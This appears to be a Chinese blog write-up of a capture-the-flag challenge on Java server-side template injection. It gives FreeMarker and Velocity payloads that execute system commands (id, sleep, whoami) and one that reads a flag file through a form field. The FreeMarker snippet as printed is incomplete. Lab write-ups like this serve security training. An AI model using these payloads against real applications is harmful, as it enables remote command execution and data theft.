free java server_Java - Server-side Template Injection

Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.

SSTI -------------------------服务端模板注入

服务器端模板:

https://www.netsparker.com/blog/web-security/server-side-template-injection/

服务器端模板提供了一种管理HTML代码动态生成的简便方法。最大的优点是您可以生成动态HTML页面,这些页面在服务器端的读取方式类似于静态HTML。

8bf85ec1a262a0a644dd7b39f77b1cd5.png

d44e317be4d1b601703c7f849bb9d0eb.png

挑战:

nickname=${"1-1"} --------------------->双引号中的类容会被显示在网页中

freemaker的payload:

${ ex("id") }

Velocity的payload:

$class.inspect("java.lang.Runtime").type.getRuntime().exec("sleep 5").waitFor()

使用freemaker成功执行:  whoami

a8933a2ba6dbb7541c404217cc60bcd0.png

payload:

nickname=

${ ex("cat SECRET_FLAG.txt") }

355434186cc2171d6064581f0db690b1.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值